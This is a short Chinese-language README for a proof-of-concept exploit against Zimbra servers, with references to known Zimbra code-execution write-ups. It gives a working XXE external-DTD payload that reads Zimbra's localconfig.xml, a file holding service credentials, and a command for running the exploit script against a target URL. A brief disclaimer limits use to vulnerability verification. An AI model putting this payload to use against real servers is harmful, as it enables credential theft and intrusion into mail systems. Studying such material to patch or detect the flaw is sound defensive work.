Zimbra POC

用法

1. 需要自己在源代码中修改dtd_url为如下内容的dtd地址：

<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">

2. 使用方法：

python zimbra_poc.py https://target.com

3. POC仅供验证漏洞使用，请勿用于非法用途。

参考资料

1. 《A Saga of Code Executions on Zimbra》

2. What Are XML External Entity (XXE) Attacks

3. 漏洞预警 | Zimbra 远程代码执行漏洞

4. CVE-2013-7091 EXP

5. Zimbra Soap API

6. 《A Saga of Code Executions on Zimbra》RCE漏洞分析+复现过程